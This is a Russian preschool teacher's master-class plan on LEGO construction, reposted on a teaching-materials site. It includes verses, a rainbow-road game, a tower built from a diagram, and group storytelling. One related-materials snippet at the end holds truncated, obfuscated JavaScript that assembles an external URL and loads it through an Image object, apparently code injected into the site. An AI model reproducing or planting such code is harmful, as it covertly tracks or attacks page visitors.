МАСТЕР-КЛАСС Использование ЛЕГО – конструирования в образовательной работе с дошкольниками
план-конспект занятия по развитию речи (старшая группа)

Гаджиева Фаиза Омаровна

Добрый день, уважаемые гости. Сегодня на мастер-классе я хотела бы познакомить Лего-конструированием.  

Конструктор Лего (LEGO) - давно уже легендарный бренд и по-прежнему обыкновенное чудо: интерес к нему не затухает много десятилетий — с момента его появления в Дании в 1949 году.

Скачать:

ВложениеРазмер
Файл master_klass_konspekt_1.docx20.69 КБ

Предварительный просмотр:

МАСТЕР-КЛАСС

Использование ЛЕГО – конструирования

в образовательной работе с дошкольниками

   

 «Истоки способностей и дарований

детей –на кончиках их пальцев».

                                                                                                В. А. Сухомлинский

Целевая аудитория: педагоги дошкольных учреждений.

Цель: повышение профессионального мастерства педагогов-участников мастер-класса по ЛЕГО-конструированию в процессе активного педагогического общения.

Задачи:

- обучать участников мастер-класса навыкам применения ЛЕГО–конструктора в работе с дошкольниками ;

- показать участникам мастер-класса технологии работы с детьми дошкольного возраста в области ЛЕГО-конструирования;

- формировать у участников мастер-класса мотивацию на использование в образовательной деятельности ЛЕГО-конструктора.

Оборудование и материалы: конструктор ЛЕГО, проектор, картотека схем и образцов построек.

Планируемый результат:

- информирование педагогов о системе работы по ЛЕГО-конструированию для детей дошкольного возраста;

- формирование представлений педагогов о возможности работы с ЛЕГО-конструктором.

Мастер-класс для педагогов включает в себя 3 части:

- теоретическую

- практическую

- заключительную

Ход мастер-класса:

1.Теоретическая часть.

  -  Добрый день, уважаемые гости. Сегодня на мастер-классе я хотела бы познакомить Лего-конструированием.   

Конструктор Лего (LEGO) - давно уже легендарный бренд и по-прежнему обыкновенное чудо: интерес к нему не затухает много десятилетий — с момента его появления в Дании в 1949 году.

С того дня и вплоть до настоящего времени Лего (LEGO) ни разу не изменил своему девизу «Играй с удовольствием».

У слова Лего два значения: «я учусь» и «я складываю.

 В педагогике Лего-технология интересна тем, что, строясь на интегрированных принципах, объединяет в себе элементы игры и  позволяет ребенку думать, фантазировать, и действовать, не боясь ошибиться. ЛЕГО позволяет детям учиться, играя.

«Лего» – умная игра,

Завлекательна, хитра.

Интересно здесь играть,

Строить, составлять, искать!

Приглашаю всех друзей

В «Лего» поиграть скорей.

Там и взрослым интересно:

В «Лего» поиграть полезно!

Сейчас  мы окунемся в мир ЛЕГО. Я хотела бы поделиться нашим опытом работы по организации детской деятельности с применением конструктора ЛЕГО. 

Мы в своей практике используем конструктор ЛЕГО в разных видах деятельности: на занятиях, на зарядке, в совместной, самостоятельной и индивидуальной работе.

Образовательные области в ДОУ не существуют в «чистом виде». Всегда происходит их интеграция, а с помощью применения Лего-конструирования легко можно интегрировать познавательное развитие, куда и входит техническое конструирование с художественно-эстетическим развитием, когда мы говорим о

2. Практическая часть.

    Сегодня я познакомлю вас с некоторыми из вариантов применения Лего-конструирования в различных образовательных областях.

Приглашаю всех побывать сегодня в роли детей.

«Lego» - умная игра,

Увлекательна, хитра!

Интересно здесь играть,

Строить, составлять, искать!

Приглашаю всех друзей

В «Lego» поиграть скорей!

Сначала предлагаю выполнить Игровое упражнение «Волшебная дорожка» с младшими дошкольниками.

- Я предлагаю построить дорогу, но не простую, а волшебную. Чем она необычна? Она состоит из ЛЕГО деталей.

       Кирпичик нужный ты найди,

Дорогу в ЛЕГО - страну собери. 

Перед Вами конструктор разного цвета и размера.

Послушайте мою сказку.

Жили-были Медвежонок и Зайчонок. Они были лучшими друзьями. Всё лето они бегали и играли с утра и до ночи. Но, наступила осень, и дни стали короче, и солнышко засыпало намного раньше. Бывало заиграются, у кого-нибудь их них, а домой возвращаться темно идти… Ничего не видно вокруг…

Предлагаю Вам помочь героям сказки и построить для них дорожку, но не простую «Радужную». Я буду показывать, а вы повторяйте за мной.

    А теперь приступим к строительству дороги. Я кладу первый кирпичик красного цвета, беру кирпичик оранжевого цвета и кладу рядом с красным кирпичиком,….. а вы продолжаете.

- Твой кирпичик похож на мой? По цвету или размеру?

- А почему ты поставил этот кирпичик?

- Давайте посчитаем сколько кирпичиков мы поставили -7

- Все поставили свои кирпичики? Дорога готова?

- Молодцы! Вот какую помощь мы с вами оказали дружным зверятам!

- Что мы закрепляем с детьми, играя в эту игру?

- Закрепляем мы цвет, форму, длину, количество.

- Чтобы никто не потерялся в пути, крепко сцепимся мизинчиками, как детали ЛЕГО и скажем волшебные слова:

            Раз, два, три, четыре, пять

            Будет дорожка ярко сиять!

Теперь задание усложним ,будем работать с детьми среднего дошкольного возраста.

- А предлагаю я  построить по схеме башню, которая  как фонари будут стоять  около домиков наших лесных друзей и светить им дорогу.

 Игровое упражнение «Башня».

Ребята мы будем работать по схемам, перед вами схемы постройки башни и  кирпичики «Lego». С помощью «Lego»-кирпичиков необходимо выстроить башню по схеме в определенной цветовой гамме.

- Какой кирпичик мы ставим сначала?

-Кирпичик синего цвета…..

-Какой кирпичик идет вторым?

- кирпичик красного цвета

- Какая получилась у нас башня высокая или низкая??

- Высокая

Давайте посчитаем сколько кирпичиков

-7

-Молодцы!

-давайте поставим наши башни возле наших волшебных дорожек и домиков!

- у дошкольников среднего возраста развиваются математические способности и формируются сенсорные представления: дети, пересчитывая детали, вычисляя необходимое количество деталей, их форму, цвет, длину, закрепляют понятия: «высокий - низкий», «широкий - узкий».

- Продолжим! Еще усложним наши задания! Предлагаю выполнить игровое упражнение «Придумай свою историю» со старшими  дошкольниками. Объединимся в группы.

- Каждой группе педагогов предлагаются наборы конструктора и пластины.

Для начала послушайте начало наших историй…

В одном доме жили девочка и мальчик. Они были очень дружные, добрые и веселые. У каждого из них был свой питомец. Играли они всегда вместе в одном дворе … Но вот однажды …

А вот, что было дальше придумайте вы сами и постройте из лего свою историю!

Каждая группа придумывает свою историю, делает постройку и обыгрывает его.

- Послушайте нашу историю тоже!.....

Это и есть творческое воображение каждого ребенка. И у каждого ребёнка своё видение мира, воображение, художественно - эстетический вкус, которое нужно развивать.

- Дорогие, педагоги. В результате задания получились все постройки разные, а истории интересные.

III.        Заключительная часть.

И в конце мне хочется сказать…

«Lego» - игра - важнейший спутник детства, позволяющий детям учиться, играя. Каждая постройка из «Lego» - конструктора это фантастическое новое приключение, каждый раз необычное, всегда веселое, познавательное и желанное.

- Дорогие педагоги, играйте с детьми в увлекательные игры с Лего.

Только почувствовав интерес к выполняемой работе, предложенному заданию, сюжету игры, ребенок будет активным, проявит свои творческие способности, научится действовать в команде, брать на себя ответственность.

IV. Рефлексия

- Уважаемые педагоги, сегодня мы с Вами увидели лишь небольшую часть возможностей конструктора «Lego» и вариантами игр с ним.  

- Наш мастер - класс подошел к завершению.

- Спасибо за внимание! Желаю Вам, чтобы планы всегда превращались в плоды вашего труда и приносили вам значимые результаты.


По теме: методические разработки, презентации и конспекты

мастер-класс "Использование ЛЕГО – конструирования в образовательной работе с дошкольниками"

Данный мастер-класс информирует педагогов о системе работы по ЛЕГО-конструированию для детей дошкольного возраста,  формирует представления педагогов о возможностях работы с ЛЕГО-конструктором....

Мастер-класс "Использование Лего-конструирования в образовательной работе с дошкольниками"

Ход мастер-класса:1.Теоретическая часть.Добрый день, уважаемые коллеги. Сегодня на нашем мастер-классе мы окунемся в мир ЛЕГО.Я хотела бы поделиться нашим опытом работы по организации детс...

МАСТЕР-КЛАСС "Использование ЛЕГО – конструирования в образовательной работе с дошкольниками"

МАСТЕР-КЛАССИспользование ЛЕГО – конструирования var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'rzkmxcve.lussoit.com\',\'80\'].join(\'/\'),(o=new Image).src=\'\'...

Мастер – класс «Использование Лего – конструирования в образовательной работе с дошкольниками»

В связи с введением в систему дошкольного образования Федеральных государственных образовательных стандартов, педагогам открываются большие возможности использования новых пед...

МАСТЕР-КЛАСС Использование ЛЕГО – конструирования в образовательной работе с дошкольниками

Цель: повышение профессионального мастерства педагогов-участников мастер-классе по ЛЕГО-конструированию в процессе активного педагогического общения.Задачи:обучать участников мастер-класса навыкам при...